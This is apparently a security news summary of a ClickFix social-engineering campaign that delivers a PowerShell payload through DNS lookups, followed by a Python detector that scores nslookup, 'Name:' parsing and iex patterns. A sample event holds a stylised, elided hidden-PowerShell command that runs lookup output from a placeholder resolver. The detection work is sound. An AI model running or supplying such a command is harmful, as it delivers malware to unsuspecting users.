• Threat actors are now abusing DNS queries as part of ClickFix social engineering attacks to deliver malware, making this the first known use of DNS as a channel in these campaigns.
• ClickFix attacks typically trick users into manually executing malicious commands under the guise of fixing errors, installing updates, or enabling functionality.
• However, this new variant uses a novel technique in which an attacker-controlled DNS server delivers the second-stage payload via DNS lookups.

DNS queries deliver a malicious PowerShell script

• In a new ClickFix campaign seen by Microsoft, victims are instructed to run an nslookup command that queries an attacker-controlled DNS server instead of the system's default DNS server.
• The command returns a DNS response containing a malicious PowerShell script, which is then executed on the device to install malware.
• "Microsoft Defender researchers observed attackers using yet another evasion approach to the ClickFix technique: Asking targets to run a command that executes a custom DNS lookup and parses the Name: response to receive the next-stage payload for execution," reads an X post from Microsoft Threat Intelligence.
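As an added example (not code from the article, Microsoft, or any vendor), the following Python scores process-creation events for the signals the campaign description gives: nslookup aimed at an explicit resolver, the "Name:" response line being parsed, and the result reaching a PowerShell execution primitive. The event field names, score weights, threshold and sample events are assumptions made for this illustration.

```python
import re

# Signals drawn from the reported chain: nslookup pointed at a non-default
# resolver, the "Name:" line of its output being parsed, and the result
# handed to a PowerShell execution primitive. Weights are an assumption.
NSLOOKUP_RE = re.compile(r"\bnslookup(?:\.exe)?\b", re.I)
# IPv4 resolver given after the query name (hostname resolvers not covered).
EXPLICIT_RESOLVER_RE = re.compile(
    r"\bnslookup(?:\.exe)?\b[^|;&]*?\s\d{1,3}(?:\.\d{1,3}){3}\b", re.I)
NAME_PARSE_RE = re.compile(r"\bName:", re.I)
EXEC_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
HIGH_SEVERITY = 6  # assumed threshold for the combined score


def score_event(event):
    """Return (score, reasons) for one process-creation event (a dict)."""
    cmd = event.get("command_line", "")
    reasons = []
    if not NSLOOKUP_RE.search(cmd):
        return 0, reasons
    score = 1
    reasons.append("nslookup invoked")
    if EXPLICIT_RESOLVER_RE.search(cmd):
        score += 2
        reasons.append("query sent to an explicit resolver address")
    if NAME_PARSE_RE.search(cmd):
        score += 2
        reasons.append("command parses the 'Name:' response line")
    if EXEC_RE.search(cmd):
        score += 3
        reasons.append("lookup output feeds an execution primitive")
    if "powershell" in (event.get("image", "") + event.get("parent_image", "")).lower():
        score += 1
        reasons.append("PowerShell in the process chain")
    return score, reasons


def high_severity_indices(events):
    """Indices of events whose score reaches HIGH_SEVERITY."""
    return [i for i, ev in enumerate(events) if score_event(ev)[0] >= HIGH_SEVERITY]


# Constructed sample events (not real telemetry). Resolver addresses come from
# the 203.0.113.0/24 documentation range; the third command line is stylised.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\nslookup.exe",
     "command_line": "nslookup www.example.com"},
    {"parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\nslookup.exe",
     "command_line": "nslookup -type=mx example.com 203.0.113.53"},  # admin troubleshooting
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -c "iex (... (nslookup lookup.example.invalid 203.0.113.10 | findstr Name:) ...)"'},
]
```

Only the third constructed event crosses the threshold; the second shows why an explicit resolver alone should stay a low-severity signal, since administrators query alternate DNS servers routinely.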